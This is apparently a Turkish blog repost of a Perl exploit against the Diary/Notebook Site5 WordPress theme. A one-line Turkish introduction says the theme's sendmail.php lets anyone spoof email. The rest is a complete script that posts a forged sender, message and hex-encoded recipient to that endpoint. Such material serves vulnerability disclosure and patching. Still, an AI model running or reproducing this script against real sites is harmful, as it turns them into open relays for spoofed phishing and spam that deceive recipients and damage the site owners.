WordPress Diary/Notebook Site5 Theme Email Spoofing

WordPress Diary Notebook Eklentisi ‘wp-content/themes/diary/sendmail.php’ bulunan açıkla aşağıdaki perl exploitle Email Spoofing yapılmasına imkan sağlıyor.

#!/usr/bin/perl

# Exploit Title: Diary/Notebook Site5 WordPress Theme – Email Spoofing

# Date: 15.07.2012

# Exploit Author: @bwallHatesTwits

# Discovered by: @xxDigiPxx (http://www.ticktockcomputers.com/wordpress/site5-wordpress-theme-diary-sendmail-php-spoofing/)

# Software Link: http://www.wpdiarytheme.com/

# Vendor Homepage: http://www.site5.com/

# Others Possibly Vulnerable: http://www.site5.com/wordpress-themes/

# Version: Not Documented

# Tested on: Linux 3.2

use strict;

use warnings;

use LWP::UserAgent;

use HTTP::Request::Common qw{ POST };

#Change this to the root of the WordPress

my $wordpress = ‘http://localhost/wordpress/’;

my $url = $wordpress.’wp-content/themes/diary/sendmail.php’;

#Name shows up in the topic of the email (Website contact message from name)

my $name =’Proof of Concept’;

#Sender email address

my $email = ‘sender@mail.com’;

#Content of the email

my $comment = ‘Email content’;

#Receiver email address

my $receiver = ‘receiver@mail.com’;

$receiver =~ s/(.)/sprintf(“%x”,ord($1))/eg;

my $ua = LWP::UserAgent->new();

my $request = POST( $url, [ name => $name, email => $email, comment => $comment, receiver => $receiver, submit => ‘submit’, ] );

print “Sending request to $url\n”;

my $content = $ua->request($request)->as_string();

print $content;

print “\nDone\nFollow \@BallastSec on Twitter\n”;

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir